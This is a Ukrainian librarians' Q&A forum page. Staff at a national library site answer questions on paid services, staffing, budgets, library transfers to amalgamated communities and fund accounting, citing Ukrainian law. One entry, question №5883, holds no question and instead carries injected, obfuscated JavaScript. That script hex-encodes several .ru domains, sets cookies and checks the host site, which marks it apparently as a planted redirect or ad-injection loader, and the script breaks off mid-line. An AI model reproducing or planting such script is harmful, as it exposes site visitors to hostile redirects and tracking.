Бібліотечному фахівцю

читальний зал – спеціально облаштоване приміщення, обладнане робочими столами для користувачів і призначене для роботи користувачів з документами б/ф
Розділи сайту

Закрити 1. Офіційна інформація

Закрити 2. Бібліотеки України

Закрити 3. Національні бібліотеки

Закрити 4. Сторінка дослідника

Закрити 5. Зарубіжний досвід

Закрити 6. Статистична аналітика

Закрити 7. Бібліотечна планета

Закрити 8. Бібліолоція

Закрити 9. Бібліографи презентують

Закрити Методисти рекомендують

Взаємодія

Закрити Інновації/проекти

Закрити Бібліотекарі України

Закрити Бібліотечна статистика

Закрити Бібліотечний простір

Закрити Відкритий форум

Закрити Переможці конкурсів

Закрити Планування

Закрити Посміхніться

Нове на сайті
Інформація від майстра
Відвідувачі

   відвідувачі

   відвідувачів online


Page Rank Check
Запитання-відповіді


В цьому розділі можна поставити фахові питання. Шановні колеги, просимо попередньо переглянути вже розміщені матеріали.
P.S.: Питання "де знайти в електронному вигляді, в інтернеті, в бібліотеці" вважаються тролінгом і видаляються.
P.P.S.: Увага! З метою надання більш чітких відповідей, просимо в питаннях конкретизувати регіон, вид Вашої бібліотеки за призначенням (публічна, спеціальна, спеціалізована) та за значенням (обласна, міська, районна, селищна, сільська).
3P.S.: Питання також можна направляти на адресу method@nplu.org
4P.S: Питання, що стосуються роботи ЕСМаР, надсилайте на ecmap@nplu.org

Питання №5894 Olena 20/01/2016 × 14:32
http://www.lib-krm.org
Шановні колеги! Поясніть будь ласка, в п. 3 Наказу  КМУ, Міністерства фінансів та Міністерства економічного розвитку і торгівлі  від 01.12.2015 № 1004/1113/1556 зазначено, що перелік платних послуг встановлюється керівниками державних та комунальних закладів культури конкретного міста чи району. Чи означає це, що Перелік платних послуг, встановлений постановою Кабінету Міністрів України від 12 грудня 2011р. № 1271 "Про затвердження переліку платних послуг, які можуть надаватися закладами культури, заснованими на державній та комунальній формі власності", може бути розширено чи змінено на місцевому рівні?Будь ласка, сподіваємось на Вашу відповідь. 
Відповідь. Щоб уникнути проблем під час ревізії фінансово-господарської діяльності бібліотеки Ви маєте впроваджувати платні послуги відповідно саме «ПЕРЕЛІКУ платних послуг, які можуть надаватися закладами культури, заснованими на державній та комунальній формі власності» , затвердженого постановою Кабінету Міністрів України від 12 грудня 2011 р. N 1271 /Режим доступу: http://zakon5.rada.gov.ua/laws/show/1271-2011-%D0%BF .
Питання №5893 ivanna 19/01/2016 × 15:50
Доброго дня, шановні колеги!Вітаю з Новим роком і бажаю всім мирного неба над головою і рідної землі під ногами! У мене до Вас запитання такого характеру: чи буде  затверджений примірний штатний розпис централізованої бібліотечної системи, вт.ч. центральної районної бібліотеки; чи має право директор ЦБС в межах існуючого штатного розпису створити новий відділ (бібліографічний) з числа працівників ЦРБ (бібліограф відділу обслуговування, бібліограф районної дитячої бібліотеки та редактор організаційно-методичного відділу). Дякую.
Відповідь. 1. Питання затвердження примірного штатного розпису ЦБС – в компетенції Міністерства культури /Режим доступу: info@mincult.gov.ua

2. Власник або уповноважений ним орган має право у будь-який час внести зміни до штатного розпису, зокрема в разі структурної перебудови бібліотеки (створення нових або ліквідація наявних структурних підрозділів), у зв’язку зі змінами в організації виробництва і праці (зміна розмірів оплати праці, розрядів і найменування посад і професій), при потребі ввести або вивести посади, професії, установити доплати (надбавки). Будь-які зміни, що стосуються штатного розпису, здійснюються лише на підставі наказу (належать до наказів із загальної діяльності). Причому в разі структурної перебудови видається наказ про затвердження нового штатного розпису і скасування чинного (як правило, новий наказ набуває чинності з першого числа наступного місяця). В інших випадках наказом вносяться зміни без перезатвердження чинного штатного розпису. Кількість і періодичність змін штатного розпису протягом року нормативними документами не обмежуються.

3. Дякуємо за привітання! smile
Питання №5892 ALLA 18/01/2016 × 15:45
В ЦБС входят -  центральная городская библиотека, городская библиотека для детей и 6 библиотек-филиалов.Городскую библиотеку для детей возглавляет заместитель директора по работе с детьми. В связи с объединением громад и увеличением количества библиотек комплексного обслуживания, возможно ли изменить штатное расписание  так, чтобы городскую библиотеку для детей возглавляла заведующая библиотекой, а заместителя директора перевести в центральную городскую библиотеку, изменить и расширить его должностные обязанности?
Відповідь. Пропонуємо ознайомитись із ст. 32 КЗпП України, п.31 Постанови Верховного Суду України від 06.11.92 р. № 9 та. п.2 відповіді на питання № 5893.
Питання №5891 Valya 18/01/2016 × 11:34
Доброго дня!Мене цікавить перспективи районної бібліотеки в результаті утворення об"єднаної громади нашого райцентру і сусіднього села?Якщо вихід з ЦБС окремих сільських установ в результаті такого ж об"єднання іншої громади, більш-менш зрозуміло.То що ж має бути з районною бібліотекою ,її завданнями,функціями та й з працівниками?Дякую за відповідь.
Відповідь. На сьогоднішній день це питання знаходиться виключно у компетенції органів місцевого самоврядування. Проте чинними залишаються Мінімальні соціальні нормативи забезпечення населення публічними бібліотеками в Україні, затверджені постановою Кабінету Міністрів України від 30 травня 1997 р. N 510.

Пропонуємо ознайомитись з пропозиціями: 1-й варіант). Якщо РБ передано у власність новоутвореної ОТГ, оптимальним буде створення рішенням органу місцевого самоврядування ОТГ комунального закладу (бажано - зі статусом юридичної особи) – «Публічна бібліотека GGGGG об’єднаної територіальної громади» (або «GGGG публічна бібліотека» тощо) що перебуватиме у власності ОТГ та утримуватиметься з її бюджету. Якщо у власності ОТГ знаходяться інші публічні бібліотеки, то вони можуть стати філіями «Публічної бібліотека GGGGG об’єднаної територіальної громади». У разі перейменування бібліотек об’єднаних територіальних громад та залишенням без змін їх штатних розписів, до трудових книжок працівників вноситься тільки запис про перейменування закладу (див. Наказ Мінюсту від 05.03.2012 р.). У разі скорочення чисельності або штату працівників врегулювання трудових відносин здійснюється згідно з пунктом 1 статті 40 КЗпП України. У разі згоди окремих працівників на переведення до іншої ПБ врегулювання трудових відносин здійснюється згідно з пунктом 5 статті 36 КЗпП України.

2-й варіант). Всі бібліотеки, які знаходяться у власності ОТГ можуть мати самостійний статус і фінансуватися із бюджету ОТГ самостійно. Засновник зобов’язаний забезпечувати у повному обсязі фінансові потреби бюджетної установи.

3-ій варіант). РБ залишається у спільній комунальній власності територіальних громад і утримується за рахунок районного бюджету. В той же час, якщо відповідно Договору про співпрацю РБ буде надавати певні послугу ПБ ОТГ (методичну, обробку БФ тощо), то відповідно до ст. 93 Бюджетного кодексу України ОТГ частково компенсують утримання РБ у частині надання послуг бібліотекам ОТГ.
Питання №5890 svitlana 18/01/2016 × 10:32
http://бібліотекар
Доброго дня, шановні колеги. Прошу надати мені допомогу. Я працюю в міській ЦБС. В одній з бібліотек звільнилася бібліотекар. Матеріальну відповідальність директор оформила на бібліотекаря відділу комплектування. Чи мала вона право це робити? Сказала, що як прийде новий працівник, тоді просто все передасиш. Але працівника немає і тепер вона сказала, що 4 години я маю працювати в відділі обробки, а інші 4 години обслуговувати в бібліотеці. Бібліотека в дуже поганому стані : сантехніка не працює, половина бібліотеки без освітлення, грибок роз"їдає стіни. Чи можу я відмовитися від роботи в бібліотеці через неналежні умови праці? Дякую.
Відповідь. Директор ЦБС, його підлеглі виконують свої функції відповідно до посадових інструкцій. Питання переведення/переміщення працівників прописані у ст. 31 КЗпП України.
Питання №5888 Juliya 18/01/2016 × 09:47
Доброго  дня, підскажіть будь ласка літературу для написання курсової роботи на тему: "Роль бібліотек в системі збереження духовних цінностей учнівської молоді та юнацтва"
Відповідь. Просимо переадресувати запит на віртуальну довідку НПБУ /Режим доступу: http://www.nplu.org/article.php?id=40 .
Питання №5887 anna 17/01/2016 × 13:11
Доброго дня! За основним м¡сцем роботи я працюю учителем з тижневим навантаженням 9 годин та за сум¡сництвом в ц¡й же школ¡  на 0.5 ставки б¡бл¡отекарем.Зг¡дно п. 2 постанови КМУ в¡д 03.04.1993 √245  не обумовлено, за якою роботою визначаеться норма тривалост¡ робочого часу впродовж м¡сяця--за основною чи на посад¡ за сум¡сництвом.Чи маю я право працювати за сум¡сництвом на ставку б¡бл¡отекаря,маючи  0.5 ставки учителя по основн¡й робот¡? 
Дякую.
Відповідь. Працівники можуть працювати за сумісництвом: у робочі дні - не більше 4 годин на день (п. 2 Постанови № 245); у вихідні - повний робочий день. Загальна тривалість їх роботи за сумісництвом протягом місяця не повинна перевищувати половини місячної норми робочого часу.
Питання №5886 ekaterina 17/01/2016 × 12:32
Добрый день! Ответьте , пожалуйста, может ли новый  начальник сектора культуры требовать в усной форме от директора ЦБС изменения графика работы (было с 9 до 18 , хочет с 8 до 17),мотивируя тем, что администрация и др. гос.учереждения работают с 8 утра. Мы согласны работать с 8( не ругаться же) , но как это провести по документации , что бы нас не обвенили в своеволии, помогите, пожалуйста, мы 24 года работали по старому графику.
Відповідь. Не може. Пропонуємо нагадати нач. сектору культури, що публічна бібліотека – це не адмінустанова, а заклад, результатом діяльності якого є задоволення інформаційних, науково-дослідних, освітніх, культурних та інших потреб користувачів бібліотеки . Пропонуємо закцентувати увагу нач. сектора на підпункті 5 пункту 6 Прикінцевих положень ЗУ «Про внесення змін до деяких законодавчих актів України» (від 24.12.2015 № 911-VIII) /Режим доступу: http://zakon0.rada.gov.ua/laws/show/911-19/page , який зобов’язує органи місцевого самоврядування забезпечити: побудову нової моделі надання послуг музеями та бібліотеками, розширення переліку послуг з організації дозвілля населення з використанням новітніх технологій; створення на базі бібліотек державної та комунальної власності центрів обслуговування громадян, основним завданням яких є задоволення потреб громадян у публічній інформації, забезпечення їх доступу до державних та регіональних електронних інформаційних ресурсів, надання консультативних послуг з питань електронного оформлення звернень до органів державної влади. Як публічна бібліотека, працюючи до 17.00. або до 18.00., зможе довести доступність до бібліотечних послуг та поліпшити роботу з надання таких послуг, якщо робочий день більшості громадян закінчується о 18.00. або 19.00.; якщо учнівська молодь повертається з занять, груп подовженого дня після 16-17.00. годин? Додатково пропонуємо ознайомитись із постом на сайті Творчість та інновації в українських бібліотеках від 17 жовтня 2013 р. /Режим доступу: https://libinnovate.wordpress.com/2013/10/17/%D1%87%D0%B8-%D0%B4%D0%BE%D1%81%D1%82%D1%83%D0%BF%D0%BD%D1%96-%D0%BD%D0%B0%D1%88%D1%96-%D0%BA%D0%BD%D0%B8%D0%B3%D0%BE%D0%B7%D0%B1%D1%96%D1%80%D0%BD%D1%96-%D0%B0%D0%B1%D0%BE-%D0%BF%D1%80%D0%BE-%D0%B3/.

P.S. Режим роботи ЦБС регулюється в Колдоговорі та затверджених Правилах внутрішнього трудового розпорядку. Зміни вносяться згідно рішення загальних зборів працівників ЦБС.
Питання №5885 Ludmila 16/01/2016 × 11:44
Чи могди б Ви дати роз'яснення щодо НаказуN 1004/1113/1556 від 01.12.2015 р. Міністерства фінансів, міністерства культури та міністерства економічного розвитку і торгівлі України "Про затвердження Порядку визначення вартості та надання платних послуг закладами культури, заснованими на державній та комунальній формі власності" 
Відповідь. Мінкультури, Мінфін і Мінекономрозвитку наказом від 1 грудня 2015 № 1004/1113/1556 оновили Порядок визначення вартості та надання платних послуг закладами культури, заснованими на державній та комунальній формі власності. Цей наказ допоможе бухгалтерії встановити механізм визначення вартості та надання платних послуг закладами культури, заснованими на державній та комунальній формі власності (далі - заклади культури), юридичним та фізичним особам (далі - замовник) згідно з переліком платних послуг, які можуть надаватися закладами культури, заснованими на державній та комунальній формі власності, затвердженим постановою Кабінету Міністрів України від 12 грудня 2011 року N 1271
Питання №5884 mariya 16/01/2016 × 09:54
Доброго дня! Підкажіть, будь-ласка, чи може працювати у районній бібліотеці ЦБС людина, яка здобуває фах бібліотекаря, але перебуває у родинних стосунках з директором ЦБС. Чи не є це порушенням? Заздалегідь вдячна за відповідь.
Відповідь. Відповідно до Ст. 25-1КЗпП України: власник вправі запроваджувати обмеження щодо спільної роботи на одному і тому ж підприємстві, в установі, організації осіб, які є близькими родичами чи свояками (батьки, подружжя, брати, сестри, діти, а також батьки, брати, сестри і діти подружжя), якщо у зв'язку з виконанням трудових обов'язків вони безпосередньо підпорядковані або підконтрольні один одному. В той же час, відповідно до п.4 ч.1 ст.9 ЗУ ”Про засади запобігання і протидії корупції” (07.04.2011 № 3206-VI, із змінами)/Режим доступу: http://zakon0.rada.gov.ua/laws/show/3206-17 заборона на безпосереднє підпорядкування близьких осіб не поширюється на осіб, які працюють у галузі освіти, науки, культури і т.п. Якщо Ваша бібліотека є самостійною юридичною особою і публічною бібліотекою, утвореною відповідно до ЗУ ”Про бібліотеки і бібліотечну справу” (від 27.01.1995 № 32/95-ВР /Режим доступу: http://zakon4.rada.gov.ua/laws/show/32/95-вр у директора бібліотеки, як посадової особи галузі культури, в підпорядкуванні можуть перебувати близькі особи і це не буде порушенням антикорупційного законодавства (тим паче, що матір - рядовий бібліотекар, до категорії посадових осіб не належить).
Питання №5883 Tanya 15/01/2016 × 18:52
http://http://izcrb.at.ua/
window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t= "15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n> o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "profy.nplu.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Питання №5882 Olga 15/01/2016 × 09:34
Добрый день! Мы будем  очень благодарны, если  Вы проконсультируете нас по таким вопросам:1. Нужно ли приходовать на баланс периодические издания, приобретенные по КЭКР 3110?2. Если нужно, то увеличивается ли общая сумма библиотечного фонда на сумму подписки?3. Если увеличивается, то каков механизм списания суммы подписки в библиотеке?С уважением, отдел комплектования и обработки литературы, ЦГБ им. Леси Украинки, Дружковской ЦБС
Відповідь. 1). Періодичні видання, придбані за КЕКВ 3110, слід оприбутковувати на баланс. Таку періодику необхідно обліковувати у складі бібліотечного фонду на субрахунку 112 з урахуванням усіх нюансів обліку бібліотечних фондів у складі необоротних активів (визначення строку корисного використання, нарахування зносу). 2). Загальна кількість БФ збільшується на кількість примірників. Адже, відповідно до п. 5.5 ІНСТРУКЦІЇ з обліку документів, що знаходяться в бібліотечних фондах (затверджено Наказом МКТ України від 03.04.2007 р. № 22 /Режим доступу: http://zakon3.rada.gov.ua/laws/show/z0530-07 ): журнальні та газетні видання підлягають обліку в Книзі сумарного обліку бібліотечного фонду. Записи до цієї книги про надходження газетних видань заносяться на підставі річного підсумкового акта приймання-здавання видань (без зазначення ціни). Записи про надходження журнальних видань заносяться щомісяця (без зазначення ціни). 3). Витрати, пов’язанні із придбанням періодичних видань, на підставі отриманих підтвердних документів списуються на фактичні видатки установи.
Питання №5881 Svitlana 14/01/2016 × 20:38
Доброго вечора!  Ще влітку я писала як вирішувалась доля звичайної сільської бібліотеки та її працівників на сесії сільської ради (питання № 5531). Наша історія продовжується. В липні, за порадою юриста, ми надали кожному депутатові наше звернення, в якому довели депутатам,що згідно Кодексу законів про працю України, скорочення, переведення на неповний робочий день, звільнення працівника належить лише до компетенції роботодавця, яким є голова сільської ради. Деякі депутати дослухались та не підтримали пропозицію голови сільської ради та головного бухгалтера. Коли ми написали заяву  до територіальної Державної  інспекції з питань праці у Херсонській області, так нас швидко відправили у відпустки. П'ять місяців жили спокійно,працювали. Взяли участь у місцевих виборах та самі стали депутатами. Та й нашого голову вибрали ж знову. І тут ще більше почалось протистояння.25 грудня 2015 року на сесії встає жителька села ( ніколи не була читачем і своїй дитині заборонила до нас ходити, до речі відома в селі своїми проросійськими поглядами та сепаратиськими висловлюваннями) і говорить про ініціювання  створення комісії по перевірці бібліотеки, бо вона нам, мовляв, недовіряє ( ясно, як білий день – це ідея голови) (подивіться самі код доступа : http://kl.org.ua/silska_rada/2347-5-pozachergova-sesia-7-sklikannia.html   дивитись з 2:48:00). Питання : чи правомірна буде перевірка в бібліотеці у цьому випадку? Чи можуть депутати своїм рішенням створювати комісію по перевірці по заяві жителя – не читача? І взагалі, що нам робити? Р.S. Наша бібліотека одна з кращих в районі, жодної скарги ні разу не було, одні лише грамоти та подяки.
Відповідь. Наскільки ми зрозуміли, переглянувши засідання сільської ради, рішення щодо створення «контрольно-ревізійної комісії» не було проголосовано. Зазвичай контрольно-ревізійна комісія здійснює функції контролю за фінансово-господарською діяльністю, за дотриманням положень законодавства, Положення та інших внутрішніх документів. Тому і не дивно, що громадянка, яка позиціонувала себе, як «представника громади» отримала достойну відсіч від депутатів сільради. В той же час, відповідно до ЗУ «Про звернення громадян» (в редакції від 01.01.2016 р.) «представниця громади» має право на звернення до органів місцевого самоврядування, об'єднань громадян, посадових осіб із зауваженнями, скаргами та пропозиціями. Органи державної влади і місцевого самоврядування зобов'язані об'єктивно і вчасно розглянути, перевірити викладені факти, прийняти рішення відповідно до чинного законодавства і забезпечити їх виконання, повідомити громадян про наслідки розгляду заяв (клопотань). Щодо діяльності бібліотеки ми не почули про факти порушень, зловживань, зауважень, пропозицій тощо. Якщо в законній спосіб і буде створена комісія то Ваша бібліотека її з гідністю переживе. Також, відповідно до ЗУ «Про внесення змін до статті 59 Закону України «Про місцеве самоврядування в Україні» щодо поіменних голосувань» Вашій громаді буде цікаво ознайомитись з результатами відповідного голосування та висновками комісії.
Питання №5880 Galina 14/01/2016 × 14:50
Прошу допомогти. Від нас вимагають впровадження платних послуг. Яким чином можна їх здійснювати, коли кошти на придбання касових апаратів відсутні? Дякую.
Відповідь. Відповідно до положень ст. 10 ЗУ «Про застосування реєстраторів розрахункових операцій у сфері торгівлі, громадського харчування та послуг» (від 06.07.1995 № 265/95-ВР, із змінами /Режим доступу: http://zakon3.rada.gov.ua/laws/show/265/95-%D0%B2%D1%80 ) при реалізації окремих послуг можна приймати оплату готівкою без РРО. Здійснюється це відповідно і до п.13 «ПЕРЕЛІКУ окремих форм та умов проведення діяльності у сфері торгівлі, громадського харчування та послуг, яким дозволено проводити розрахункові операції без застосування реєстраторів розрахункових операцій з використанням розрахункових книжок та книг обліку розрахункових операцій» (затверджено постановою Кабінету Міністрів України від 23 серпня 2000 р. N 1336, із змінами /Режим доступу: http://profy.nplu.org/guestbk.php?lng=uk ).

Замість РРО доведеться застосовувати розрахункові книжки (РК) і книги обліку розрахункових операцій, на господарську одиницю, яку реєструють у ДПІ за основним місцем обліку.
Питання №5879 Natali 14/01/2016 × 13:19
Доброго дня!
Поясніть, будь-ласка. В формі №6-НК "Звіт про діяльність державних, публічних бібліотек.....", в VI таблиці "Надходження та використання коштів" -"Загальна сума надходжень за рік" повинна дорівнювати 1=2+7, тобто - Усього (кошти загального фонду)+ Усього (кошти спеціального фонду).
А в яку графу відносити кошти на електроенергію та комунальні послуги?
Відповідь. Кошти за комунальні послуги включаються до загального фонду. Вочевидь Вас збентежило те, що під час сумарного підрахунку граф 3 (на оплату праці)+ 4(на комплектування)+ 5 (на проведення поточного та капітального ремонту приміщень бібліотеки)+ 6 (на придбання основних засобів) у Розділі VI. НАДХОДЖЕННЯ ТА ВИКОРИСТАННЯ КОШТІВ форми звіту N 6-НК Ви не отримуєте суму загального фонду. Але ця сума із показником загального фонду не має співпадати, так як за розподілом коштів загального фонду показник по оплаті комунальних послуг відсутній.
Питання №5878 Vlad 14/01/2016 × 12:28
Підкажіть, будь ласка, чи передбачена взагалі штатним розписом обласної наукової бібліотеки посада головного редактора? Дякую.
Відповідь.Не передбачено. Пропонуємо ознайомитись із Додатком 2 «Примірні штатні розписи комунальних бібліотек Примірні штатні розписи обласної універсальної наукової бібліотеки» до наказу Міністерства культури України від 22 серпня 2012 р. № 900 .
Питання №5877 ludmila 12/01/2016 × 16:43
Доброго дня! Шановні колеги, вітаємо Вас з Новим роком та Різдвом Христовим! Здоров"я, миру, достатку, добробуту, всього накращого , хай збудуться всі задуми та мрії!!!
Запитання: Чи можливо завідувачів відділів цетральної районної бібліотеки перевести на провідних фахівців, з покладанням  на них обовязків завідувачів, у звязку з переходом на нижчу групу по оплаті? Дякую
Відповідь. Можливо. Але, дозволимо нагадати, що посада провідного бібліотекаря, відповідно до законодавства , не відноситься до керівного складу і не може здійснювати керівництво діяльністю підпорядкованих структурних підрозділів бібліотеки. Завдання та обов’язки провідного бібліотекаря визначені у випуску 81 Довідника кваліфікаційних характеристик професій працівників, затвердженим наказом Міністерства культури і мистецтв України від 14.04.2000 № 168.

Дякуємо за привітання !
Питання №5876 nadija 12/01/2016 × 14:20
Доброго дня! Поясніть, будь-ласка, які масові заходи вважати  соціокультурними?
Відповідь. Пропонуємо ознайомитись із статтею канд. пед. наук Матвійчук Оксани Євгенівни «Закономірності розвитку бібліотек як соціокультурних центрів в Україні» /Режим доступу: http://www.stattionline.org.ua/kultura/112/20801-zakonomirnosti-rozvitku-bibliotek-yak-sociokulturnix-centriv-v-ukra%D1%97ni.html .
Питання №5875 Karina 12/01/2016 × 10:04
Доброго дня! Підкажіть, будь-ласка, чи потрібно самостійній сільскій бібліотеці, на виконання наказу МКіТ  № 745 від 18.10.2005,  щороку розпорядженням сільського голови "підтверджувати",  що об'єм роботи закладу нижче показників ІV групи?

Відповідь. Так, відповідно до наказу МКТ № 745 від 18.10.2005 віднесення бібліотек, централізованих бібліотечних систем до груп за оплатою праці керівних працівників (підтвердження, підвищення або пониження групи) провадиться щорічно вищим органом управління, у безпосередньому підпорядкуванні якого вони перебувають.
Питання №5874 Ilona 12/01/2016 × 09:48
Шановні колеги, підкажіть, будь ласка, чи існує наразі офіційна статистична інформація щодо кількості веб-сайтів публічних бібліотек України, і якщо так - буду вельми вдячна за показники.
Дякую!
Відповідь. На сьогоднішній день існує офіційна інформація стосовно кількості звернень на веб-сайти бібліотек. Але, Міністерство культури України працює над оновленням системи звітності публічних бібліотек. Вищезазначений показник дозволить отримати електронна система моніторингу мережі публічних бібліотек України (ЕСМаР).
Питання №5873 valentina 12/01/2016 × 09:22
Дайте, будь ласка, відповідь, як краще робити ретроконверсію старого фонду: за каталогом, чи по книжках? В процесі роботи виникають питання ...
Відповідь. Залежить від можливостей бібліотеки (АІБС , кількісного масиву підсобних БФ, штату тощо). Дуже добре, коли здійснюється ретроконверсія бібліотечного фонду шляхом ознайомлення з документом de visu, адже саме книга містить найповнішу інформацію для складання бібліографічного опису. Також, такий шлях передбачає використання штрихового кодування. Робота з друкованими каталогами потребує значних зусиль. Зокрема, в картках слід: викреслити всю інформацію, яку не потрібно буде вводити в базу даних, або скласти список такої інформації в інструкціях з проведення робіт (наприклад, посилання на інші каталоги, ініціали каталогізаторів і т.д.); перевірити, чи не дублюється та ж сама інформація на картці в декількох місцях (наприклад, різні форми імені автора і т.д.); згрупувати на одній картці всі примірники одного видання тощо.
Питання №5872 Tanya 11/01/2016 × 14:52
Доброго дня!
Запитання стосовно виплати доплати за стаж згідно Постанови № 84. Людина рік працювала у шкільній бібліотеці, після звільнення стояла на обліку у центрі зайнятості а через деякий час влаштувалася на роботу у публічній бібліотеці. Скажіть будь-ласка, чи може людина отримувати доплату за стаж згідно постанови № 84 якщо працювала у шкільній бібліотеці і має перерваний трудовий стаж чи потрібно почекати, коли виповниться 10 років роботи за останнім місцем роботи?
Відповідь. Доплата за вислугу років надається працівникам комунальних та державних бібліотек (публічних, спеціальних та спеціалізованих). Якщо в трудовій книжці є відповідний запис / див. п. 4. постанови Кабінету Міністрів України "Про затвердження Порядку виплати доплати за вислугу років працівникам державних і комунальних бібліотек у роботи" від 22 січня 2005 р. N 84 /Режим доступу: http://profy.nplu.org/articles.php?lng=uk&pg=82), то стаж роботи бібліотекарем у шкільній бібліотеці має бути врахований.
Питання №5871 Yuliia 11/01/2016 × 08:08
Шановна Інно Олексіївно! Сердечно вітаю Вас з Ювілеєм! Впевнена, що цей святковий, урочистий день Вашого яскравого, багатого на розмаїтості,  шляху Ви відзначаєте серед ошатних квітів, приємних, бажаних подарунків, незабутніх несподіванок у колі люблячих рідних, численних щирих колег та всієї бібліотечної родини, якою Ви по-батьківськи опікуєтесть протягом багатьох років.  Ваша фахова принциповість та далекоглядність, життєва мудрість та доброзичливість, надихає всіх , хто Вас знає, на нові творчі здобутки, особистісне становлення,  виважені рішення і у професійному житті, і в домашніх буденностях. Бажаю Вам всіх земних благ, сімейного щастя, міцного здоров'я та витримки для подолання всіх житєвих перешкод та негараздів. Хай Ваша добра вдача буде  зірковим дороговказом для всіх ще довгі роки!Щиро, з повагою,  Юля Юхневич
Питання №5870 ludmila 09/01/2016 × 19:41
Доброго дня! Щиро вітаю з Новим Роком та Різдвом Хрестовим!.Я працюю бібліотекарем на 0,5 ставки в ПТУ. Згідно "Типовому положенню про бібліотеку ПТУ " я маю право на методичний день один раз на тиждень.Чи можу я грамотно переконати своє керівництво надати мені таку змогу , чи мені мають право відмовити? в яких випадках? Дякую.
Відповідь. Ви маєте орієнтуватись не на типове положення, а на затверджене Положення про бібліотеку саме Вашого навчального закладу. Також, право на методичні дні має бути прописано у Вашій посадовій інструкції та передбачено річним планом роботи у розділі «Підвищення кваліфікації».
Питання №5869 Katerina 08/01/2016 × 09:02
Доброго дня! надішліть, будь ласка, нам на електронну пошту текст Наказу МКУ «Про впровадження електронного моніторингу базової мережі публічних бібліотек». Заздалегідь вдячні
 bibtrost@ukr.net
Відповідь. Лист надіслано 12.01.2016 р. об 11.05.
Питання №5868 Tamara 05/01/2016 × 14:45
Шановні колеги! Вітаю з новорічними святами, бажаю Вам щастя, благополуччя та шани від людей.У нашому місті одна районна бібліотека, яка є закладом спільного користування міста і району і фінансується як  з районного так і з міського бюджету але є власністю районної ради. Якщо передати районну бібліотеку у власність міської ради чи може тоді міська бібліотека виконувати функції районної бібліотеки як методичного центру сільським бібліотекам. Якими документами можна скористатися? Дякую
Відповідь. По-перше, ДЯКУЄМО !

По-друге: передача може здійснитись при наявності відповідних рішень рад. Методична функція (вже за міською бібліотекою) може бути збережена і прописана в нових установчих документах (Cтатуті або Положенні).
Питання №5867 Lara 04/01/2016 × 17:29
Шановні колеги.  Прийміть найщиріші вітання з Новим роком та Різдвом Христовим! Нехай ці свята принесуть Вам добро, мир і достаток.Через який період часу необхідно проводити переоблік  фонду рідкісних і цінних видань.
Відповідь. Інвентаризація бібліотечних фондів за рішенням керівника підприємства за встановленим ним графіком може проводиться протягом року. Інвентаризація книжкових пам’яток проводиться щороку. За наявності обсягу бібліотечних фондів від 100 до 500 тис. одиниць інвентаризація може проводитись протягом п’яти років з охопленням щорічно не менше 20 відсотків одиниць, а понад 500 тис. одиниць - протягом десяти років з охопленням щорічно не менше 10 відсотків одиниць.
Питання №5866 Lubov 04/01/2016 × 16:33
Доброго дня,колеги.Вітаю з Новим 2016 роком.Прошу  надати консультацію про методику передачі сільських бібліотек- філій до новостворених об"єднаних громад.На підставі яких документів передавати книжкові фонди,трудові книжки,матеріальні цінності бібліотек-філій?Чи потрібно розраховувати бібліотечного працівника  і на підставі чого?  З утворенням громад виникає багато запитань,на які ніхто не може дати конкретної відповіді.
Відповідь. 1). Об’єднана територіальна громада є правонаступником усього майна, прав та обов’язків територіальних громад, що увійшли до її складу. Від імені та в інтересах територіальних громад права суб’єкта комунальної власності у частині відчуження (передача у спільну власність) здійснюють виключно відповідні ради (частина п’ята статті 16, пункт 30 частини першої статті 26 Закону України «Про місцеве самоврядування в Україні», частина третя статті 1, абзац другий частини першої статті 5 Закону України «Про передачу об’єктів права державної та комунальної власності»). Майнові операції, які здійснюються органами місцевого самоврядування з об’єктами права комунальної власності, не повинні ослаблювати економічних основ місцевого самоврядування, зменшувати обсяг та погіршувати умови надання послуг населенню. у зв’язку зі змінами до бюджетного законодавства відповідні бюджетні установи (бібліотеки) обов’язково повинні бути підпорядковані належним розпорядникам коштів. Про підпорядкування бюджетної установи відповідному розпоряднику коштів свідчитимуть внесені зміни до Єдиного державного реєстру юридичних осіб та фізичних осіб-підприємців з видачею витягу у якому буде зазначений новий засновник.

2). При зміні підпорядкованості затверджується передавальний акт чи розподільчий або ліквідаційний баланс, передаються всі майнові права і обов'язки колишніх бібліотек-філій. Є відповідна форма акту приймання-передачі , в якому надається: перелік облікових одиниць згідно з балансом, загальні відомості, перелік інженерного обладнання бібліотеки, вартість основних фондів , перелік технічної документації тощо.

3). Одним із складних і спірних питань є питання про порядок припинення трудових відносин. Дане питання потребує низки уточнень. Виходячи з функцій органів місцевого самоврядування спроможних територіальних громад, у структурі їхніх виконавчих органів має бути відділ культури. Тому, пропонуємо проконсультуватись з відділом культури або в регіональному офісі реформ (/Режим доступу: http://auc.org.ua/page/ofisi-reform ) щодо штату бібліотечних працівників (їх звільнення, працевлаштування).
Питання №5865 Lyuba 04/01/2016 × 14:04
http://http://library.kr.ua
Доброго дня! Вітаємо вас з новорічними святами і зичимо найкращих побажань. Вдячні за консультації, що ви надаєте.
Просимо Вас  надіслати нам на електронну пошту текст Наказу МКУ «Про впровадження електронного моніторингу базової мережі публічних бібліотек». Будемо вам дуже вдячні.
Відповідь. Дякуємо за привітання!

Лист надіслано 05.01.16р. о 12.30.
Питання №5864 lida 04/01/2016 × 14:01
Вітаємо всіх колег Парламентської бібліотеки з Новим Роком та Різдвом Христовим! Дякуємо Вам за професійну допомогу.
Бажаємо Вам здоров"я і усякого добра!

З повагою колектив Іршавської центральної районної бібліотеки
Відповідь. ДЯКУЄМО !!! smile
